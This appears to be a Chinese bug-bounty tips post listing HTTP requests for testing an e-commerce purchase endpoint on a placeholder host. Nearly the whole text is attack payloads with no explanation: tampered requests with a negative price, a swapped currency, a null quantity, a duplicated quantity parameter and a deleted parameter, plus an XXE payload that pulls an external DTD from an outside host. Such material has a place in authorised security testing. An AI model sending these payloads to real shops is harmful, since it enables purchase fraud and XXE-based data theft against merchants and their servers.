漏洞赏金猎人系列-测试电商类相关功能步骤和Tips-I

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Origin: https://www.company.com 
Content-Length: Number
Quantity=3&price=10&currency=dollar&token=************& add=egy

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Origin: https://www.company.com 
Content-Length: Number
Quantity=1&price=-10&currency=dollar&token=************& add=egy

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Origin: https://www.company.com 
Content-Length: Number
Quantity=1&price=10&currency=INR&token=************& add=egy

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Origin: https://www.company.com 
Content-Length: Number
Quantity=null&price=10&currency=dollar&token=************& add=egy

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Origin: https://www.company.com 
Content-Length: Number
Quantity=1&Quantity=2&price=10&currency=dollar& token=************&add=egy

POST /buying-something HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded 
Origin: https://www.company.com 
Content-Length: Number
Quantity=1(这里的参数需要删除)&price=10&currency=dollar&token=************& add=egy

POST /buying-something HTTP/1.1
Host: www.company.com
Content-Type: application/xml;charset=UTF–8 
Content-Length: Number
<?xml version="1.0" encoding="UTF-8" standalone="no"?> 
<!DOCTYPE test [<!ENTITY xxe SYSTEM "http://me.com/xxe.dtd">]> <root>
<Quantity>&xxe;</Quantity>
<price>10</price>
<add>egy</add>
<token>******</token>
</root>